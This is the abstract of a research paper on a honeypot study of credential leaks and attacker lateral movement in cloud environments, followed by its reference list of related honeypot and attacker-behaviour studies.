Hack My Company: An Empirical Assessment of Post-exploitation Behavior and Lateral Movement in Cloud Environments

Cloud infrastructures and services are of essential importance for enterprise operations. They form a central point for data storage, processing and exchange. Their information security properties are strongly associated with the protection of the most confidential and important data of enterprises. In this work a credential leak on different platforms is simulated, revealing authentication information for several accounts on a cloud application service. Each account associated with the leaks provides more authentication information for further infrastructures such as an e-mail server, an industrial control system and an enterprise-related streaming server. Additionally, a homepage was launched with information on the fictitious persons associated with the leaked accounts. Interaction with those servers is closely monitored. It was found that around one third of all trespassers conducted lateral movement and successful authentications frequently result in system enumeration and file operations.

[1]  Robin Berthier,et al.  Characterizing Attackers and Attacks: An Empirical Study , 2011, 2011 IEEE 17th Pacific Rim International Symposium on Dependable Computing.

[2]  Hans D. Schotten,et al.  Data Mining in Long-Term Honeypot Data , 2017, 2017 IEEE International Conference on Data Mining Workshops (ICDMW).

[3]  Esmaeil Kheirkhah,et al.  An Experimental Study of SSH Attacks by using Honeypot Decoys , 2013 .

[4]  Hans D. Schotten,et al.  On the Detection and Handling of Security Incidents and Perimeter Breaches - A Modular and Flexible Honeytoken based Framework , 2018, 2018 9th IFIP International Conference on New Technologies, Mobility and Security (NTMS).

[5]  Xiao Han,et al.  Evaluation of Deception-Based Web Attacks Detection , 2017, MTD@CCS.

[6]  Robin Berthier,et al.  Profiling Attacker Behavior Following SSH Compromises , 2007, 37th Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN'07).

[7]  Michel Cukier,et al.  RESTRICTIVE DETERRENT EFFECTS OF A WARNING BANNER IN AN ATTACKED COMPUTER SYSTEM , 2014 .

[8]  Thorsten Holz,et al.  NoSEBrEaK - attacking honeynets , 2004, Proceedings from the Fifth Annual IEEE SMC Information Assurance Workshop, 2004..

[9]  Nick Nikiforakis,et al.  Picky Attackers: Quantifying the Role of System Properties on Intruder Behavior , 2017, ACSAC.

[10]  Damon McCoy,et al.  To Catch a Ratter: Monitoring the Behavior of Amateur DarkComet RAT Operators in the Wild , 2017, 2017 IEEE Symposium on Security and Privacy (SP).

[11]  Robin Berthier,et al.  Analyzing the process of installing rogue software , 2009, 2009 IEEE/IFIP International Conference on Dependable Systems & Networks.

[12]  Christian Jordan-Michael Howell,et al.  The Restrictive Deterrent Effect of Warning Banners in a Compromised Computer System , 2016 .

[13]  T. Holz,et al.  Detecting honeypots and other suspicious environments , 2005, Proceedings from the Sixth Annual IEEE SMC Information Assurance Workshop.

[14]  Hattie M. Jones,et al.  The Restrictive Deterrent Effect of Warning Messages on the Behavior of Computer System Trespassers , 2014 .

[15]  Gianluca Stringhini,et al.  Honey Sheets: What Happens to Leaked Google Spreadsheets? , 2016, CSET @ USENIX Security Symposium.

[16]  Marcin Nawrocki,et al.  A Survey on Honeypot Software and Data Analysis , 2016, ArXiv.

[17]  Niels Provos,et al.  A Virtual Honeypot Framework , 2004, USENIX Security Symposium.

[18]  Hans D. Schotten,et al.  Introducing GAMfIS: A generic attacker model for information security , 2017, 2017 25th International Conference on Software, Telecommunications and Computer Networks (SoftCOM).

[19]  Gianluca Stringhini,et al.  What Happens After You Are Pwnd: Understanding the Use of Leaked Webmail Credentials in the Wild , 2016, Internet Measurement Conference.

[20]  Evangelos P. Markatos,et al.  A Systematic Characterization of IM Threats using Honeypots , 2010, NDSS.

[21]  Mohammed H. Almeshekah,et al.  Planning and Integrating Deception into Computer Security Defenses , 2014, NSPW '14.

[22]  Hans D. Schotten,et al.  Defending Web Servers with Feints, Distraction and Obfuscation , 2018, 2018 International Conference on Computing, Networking and Communications (ICNC).

[23]  Davide Balzarotti,et al.  Behind the Scenes of Online Attacks: an Analysis of Exploitation Behaviors on the Web , 2013, NDSS.

[24]  P. Mell,et al.  The NIST Definition of Cloud Computing , 2011 .

[25]  Xiao Han,et al.  PhishEye: Live Monitoring of Sandboxed Phishing Kits , 2016, CCS.

[26]  Hans D. Schotten,et al.  Demystifying Deception Technology: A Survey , 2018, ArXiv.

[27]  Marc Zimmermann,et al.  Distributed and highly-scalable WAN network attack sensing and sophisticated analysing framework based on Honeypot technology , 2017, 2017 7th International Conference on Cloud Computing, Data Science & Engineering - Confluence.

[28]  Bertrand Sobesto,et al.  Empirical studies based on Honeypots for Characterizing Attackers Behavior , 2015 .